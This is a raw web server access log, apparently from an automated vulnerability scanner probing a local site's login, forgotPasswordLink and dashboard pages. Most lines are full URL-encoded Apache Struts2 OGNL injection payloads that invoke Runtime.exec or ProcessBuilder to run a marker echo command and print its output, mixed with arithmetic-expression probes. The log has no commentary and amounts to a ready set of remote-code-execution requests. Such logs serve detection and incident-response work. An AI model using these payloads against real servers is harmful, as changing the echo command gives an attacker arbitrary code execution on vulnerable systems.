127.0.0.1 - - [16/Jan/2024:03:52:34 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:35 -0500] "GET /(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:35 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:35 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:36 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:36 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:36 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:37 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:37 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:37 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:37 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:38 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:38 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:38 -0500] "GET /?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:39 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:39 -0500] "GET /$%7B4371949+1264346%7D/index.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:39 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:39 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:40 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:40 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:41 -0500] "GET /forgotPasswordLink?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:41 -0500] "GET /forgotPasswordLink?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:42 -0500] "GET /forgotPasswordLink?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:42 -0500] "GET /forgotPasswordLink?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:42 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:43 -0500] "GET /forgotPasswordLink/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:43 -0500] "GET /forgotPasswordLink/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:43 -0500] "GET /forgotPasswordLink&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:43 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:46 -0500] "GET /forgotPasswordLink&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:46 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:46 -0500] "GET /forgotPasswordLink%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:46 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:47 -0500] "GET /forgotPasswordLink%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:47 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:47 -0500] "GET /forgotPasswordLink?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:48 -0500] "GET /forgotPasswordLink?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:48 -0500] "GET /forgotPasswordLink/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:48 -0500] "GET /forgotPasswordLink/$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:49 -0500] "GET /forgotPasswordLink?redirect%3A%24%7B3316256%2B2459849%7D HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:49 -0500] "GET /forgotPasswordLink?redirect%3A%24%7B3316256%2B2459849%7D HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:49 -0500] "GET /forgotPasswordLink?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:50 -0500] "GET /forgotPasswordLink?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:50 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:50 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:51 -0500] "GET /forgotPasswordLink?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:52 -0500] "GET /forgotPasswordLink?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:52 -0500] "GET /forgotPasswordLink/%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:52 -0500] "GET /forgotPasswordLink/%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:53 -0500] "GET /forgotPasswordLink/(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:53 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:54 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:54 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:54 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:55 -0500] "POST /forgotPasswordLink HTTP/1.1" 200 2142
127.0.0.1 - - [16/Jan/2024:03:52:55 -0500] "GET /forgotPasswordLink?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:55 -0500] "GET /forgotPasswordLink/$%7B5093601+4222830%7D/index.action HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:56 -0500] "GET /forgotPasswordLink HTTP/1.1" 200 3725
127.0.0.1 - - [16/Jan/2024:03:52:57 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:57 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:58 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:58 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:58 -0500] "GET /dashboard?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:58 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:59 -0500] "GET /dashboard?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:59 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:59 -0500] "GET /dashboard?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:59 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:00 -0500] "GET /dashboard?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:00 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:00 -0500] "POST /dashboard HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:01 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:53:02 -0500] "GET /dashboard/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:02 -0500] "GET /dashboard/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:53:03 -0500] "GET /dashboard&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:53:03 -0500] "GET /login HTTP/1.1" 200 4254
